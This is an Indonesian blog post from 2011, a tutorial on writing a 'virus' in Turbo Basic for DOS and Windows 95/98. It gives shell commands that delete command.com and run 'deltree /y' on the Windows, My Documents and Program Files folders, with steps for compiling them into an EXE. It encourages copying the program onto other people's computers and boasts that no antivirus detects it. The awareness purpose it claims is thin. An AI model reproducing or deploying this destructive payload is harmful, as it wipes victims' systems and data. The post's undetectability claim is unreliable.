Sabtu, 27 Agustus 2011

Cara membuat virus di DOS


Siapa bilang membuat virus itu susah?Kali ini saya akan mencoba berbagi trik-tips dari pihak lain dan dari saya sendiri.Bagaimana Cara membuat virus dengan menggunakan DOS(Disk Operating System).artikel ini sekedar menyambung dari blog lain,dan sedikit pengetahuan saya tentang membuat virus dengan DOS.bermaksud untuk memperluas dan mempermudah bagi yang ingin tahu bagaimana membuat virus dengan DOS.DOS adalah dasar pemrograman yang harus di pahami terlebih dahulu sebelum membuat virus.
Turbo basic v1.0 adalah aplikasi bantu bentuknya sama seperti DOS yang bisa digunakan untuk membuat virus dengan mudah.Turbo basic v1.0 cukup gampang di gunakan,tinggal copas script dan kemudian compile.
Sebelum melangkah lebih jauh untuk membuat virus,mungkin beberapa bagian yang harus di pahami terlebih dahulu.beberapa syntaks di DOS:

1.”shell” di gunakan untuk menjalankan perintah DOS.sebagai contoh:
shell “c:”
shell “cd\”
shell “del command.com”
Contoh diatas adalah syntaks untuk menghapus DOS classic pada win95/98.sehingga menimbulkan komputer tidak bisa booting.
2.Masuk pada turbo basic v1.0 kamu

turbo basic
shell “c:”
shell “cd\”
shell “deltree /y mydocu~1″
shell “deltree /y windows”
shell “deltree /y progra~1″
Perintah diatas adalah untuk menghapus Directory My Document, WIndows dan Program FIles.Gimana menurut kamu?sadis kan?buset deh..
Setelah kamu selesai membuat programnya jangan lupa simpen dulu.caranya pilih File lalu Save lalu beri nama filenya misalnya VIRUSKU.BAS,habis itu compile source code tadi, carane pilih Options lalu pilih compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari trik-tips diatas, kamu dapat berkreasi sendiri bagaimana virus buatan kamu dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi kamu bebas mengcopykan program ini ke komputer manapun yang kamu suka kecuali komputer berbasis non DOS atau Windows.
Tujuan dari trik-tips ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.Sedikit tambahan dari saya.Ketahuilah beberapa syntaks DOS.
-ipconfig : untuk melihat IP Adress komputer
-help:bantuan
-dir/a:Melihat semua isi direktori dari disk yang ingin di lihat.misalnya:
E:dir/a…..maka semua akan terlihat direktorinya,tanpa terkecuali meskipun pada explorer terhidden.
-net user:untuk melihat nama pemilik komputer
-cd:change direktori/merubah direktori yang di inginkan.
Dan seterusnya…buanyak banget soalnya,,,,terlalu panjang ntar artikelnya.Gini aja deh,pelajari sendiri,dan aku kasih softwarenya dan E-book petunjuk.klik link di bawah untuk mendownloadnya.
1.Download Turbo basic v1.0
2.E-bookPetunjuk Membuat virus macro sendiri
NB:Perhatikan petunjuk penggunaan seperti:f1,f2,f3 dan seterusnya.

0 komentar:

Posting Komentar